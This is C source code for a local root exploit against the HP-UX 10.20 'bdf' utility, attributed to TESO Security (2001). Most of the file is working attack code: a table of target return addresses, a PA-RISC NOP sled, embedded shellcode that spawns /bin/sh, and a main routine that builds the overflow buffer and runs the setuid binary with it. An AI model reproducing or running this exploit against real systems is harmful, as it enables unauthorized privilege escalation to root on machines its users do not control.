/* 7350bdf - hppa/hpux bdf local root exploit
 *
 * TESO CONFIDENTIAL - SOURCE MATERIALS
 *
 * This is unpublished proprietary source code of TESO Security.
 *
 * The contents of these coded instructions, statements and computer
 * programs may not be disclosed to third parties, copied or duplicated in
 * any form, in whole or in part, without the prior written permission of
 * TESO Security. This includes especially the Bugtraq mailing list, the
 * www.hack.co.za, PacketStorm Security and SecuriTeam websites and any public
 * exploit archive.
 *
 * (C) COPYRIGHT TESO Security, 2001
 * All Rights Reserved
 *
 *****************************************************************************
 * found by scut 2001/08/21, yah yah i know its old
 * kudos to caddis for enlightning me about quadrants
 *
 */

#define	VERSION "0.0.1"

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>


void usage (char *progname);


typedef struct {
	char *		desc;
	int		bsize;	/* overall buffer size */
	int		align;

	/* the return address has to
	 *
	 *    a) lie within the shared library quadrant (within libc)
	 *    b) point to some code snippet that looks like this:
	 *
	 *       0xc0108ea8:     ldw -18(sr0,sp),rp
	 *       0xc0108eac:     ldsid (sr0,rp),r1
	 *       0xc0108eb0:     mtsp r1,sr0
	 *       0xc0108eb4:     be,n 0(sr0,rp)
	 *
	 *       this sets the space id accordingly, so we can return into
	 *       the stack
	 */
	int		ret_pos;
	unsigned int	ret_addr;

	/* this is the address our code lies at, and the position where to
	 * put it
	 */
	int		code_pos;
	unsigned int	code_addr;

	/* at least HP-UX 10.20 needs a sane value at a place, which i
	 * happened to call r15_val, since it is passed through %r15
	 */
	int		r15_pos;
	unsigned int	r15_val;
} t_elem;

t_elem	targets[] = {
	/* tested on: HP-UX calina B.10.20 A 9000/735 -sc */
	{ "HP-UX 10.20", 1200, 3, 1196, 0xc0108ea8,
		1192, 0x7b03a220, 1040, 0x7b03a4f8 },

	{ NULL, 0, 0, 0, 0, 0 },
};


/* LSD shellcode, thanks buddies */
unsigned char nop[] =
	"\x0b\x39\x02\x99";     /* xor     %r25,%r25,%r25         */

unsigned char shellcode[] =
	"\x0b\x5a\x02\x9a"	/* xor     %r26,%r26,%r26         */
	"\x0b\x39\x02\x99"	/* xor     %r25,%r25,%r25         */
	"\x0b\x18\x02\x98"	/* xor     %r24,%r24,%r24         */
	"\x20\x20\x08\x01"	/* ldil    L%0xc0000004,%r1       */
	"\xe4\x20\xe0\x08"	/* ble     R%0xc0000004(%sr7,%r1) */
	"\xb4\x16\x70\xfc"	/* addi,>  0x7e,%r0,%r22          */

	"\xeb\x5f\x1f\xfd"	/* bl      <shellcode+4>,%r26     */
	"\x0b\x39\x02\x99"	/* xor     %r25,%r25,%r25         */
	"\xb7\x5a\x40\x22"	/* addi,<  0x11,%r26,%r26         */
	"\x0f\x40\x12\x0e"	/* stbs    %r0,7(%r26)            */
	"\x20\x20\x08\x01"	/* ldil    L%0xc0000004,%r1       */
	"\xe4\x20\xe0\x08"	/* ble     R%0xc0000004(%sr7,%r1) */
	"\xb4\x16\x70\x16"	/* addi,>  0xb,%r0,%r22           */
	"/bin/shA";


void
usage (char *progname)
{
	fprintf (stderr, "usage: %s [-t <num>]\n\n", progname);
	fprintf (stderr, "-t num\tchoose target (0 for list)\n\n");

	exit (EXIT_FAILURE);
}


int
main (int argc, char *argv[])
{
	char		c;
	int		b_walker;
	unsigned int *	iptr;
	unsigned char	buf[2048];

	char *		n_argv[3];
	char *		n_env[1];

	int		tgt_num = -1;
	t_elem *	tgt;


	printf ("7350bdf - hppa/hpux bdf local root exploit\n"
		"-scut\n\n");

	while ((c = getopt (argc, argv, "t:")) != EOF) {
		switch (c) {
		case 't':
			tgt_num = atoi (optarg);
			break;
		default:
			usage (argv[0]);
			break;
		}
	}

	if (tgt_num < 0)
		usage (argv[0]);

	if (tgt_num == 0) {
		printf ("num . description\n");
		printf ("----+--------------------------------\n");

		for ( ; targets[tgt_num].desc != NULL ; ++tgt_num)
			printf ("%3d | %s\n", tgt_num + 1,
				targets[tgt_num].desc);

		printf ("    '\n");

		exit (EXIT_SUCCESS);
	}

	if (tgt_num >= (sizeof (targets) / sizeof (t_elem)))
		usage (argv[0]);

	tgt = &targets[tgt_num - 1];
	printf ("using: %s\n", tgt->desc);

	memset (buf, '\0', sizeof (buf));

	/* set nops */
	if (tgt->align != 0)
		memset (buf, 'A', tgt->align);

	for (b_walker = tgt->align ; b_walker < (tgt->bsize - tgt->align) ;
		b_walker += 4)
	{
		buf[b_walker] = nop[0];
		buf[b_walker + 1] = nop[1];
		buf[b_walker + 2] = nop[2];
		buf[b_walker + 3] = nop[3];
	}

	if (tgt->r15_pos != 0) {
		iptr = (unsigned int *) &buf[tgt->r15_pos];

		*iptr = tgt->r15_val;	/* sane %r15 */
	}

	iptr = (unsigned int *) &buf[tgt->code_pos];
	*iptr = tgt->code_addr;	/* real retaddr */

	iptr = (unsigned int *) &buf[tgt->ret_pos];
	*iptr = tgt->ret_addr;	/* yay! */

	/* we assume the buffer is 1024 bytes long */
	memcpy (&buf[1023] - strlen (shellcode), shellcode,
		strlen (shellcode));

	buf[tgt->bsize] = '\0';

	n_argv[0] = "/usr/bin/bdf";
	n_argv[1] = buf;
	n_env[0] = NULL;

	execve (n_argv[0], n_argv, n_env);

	exit (EXIT_FAILURE);
}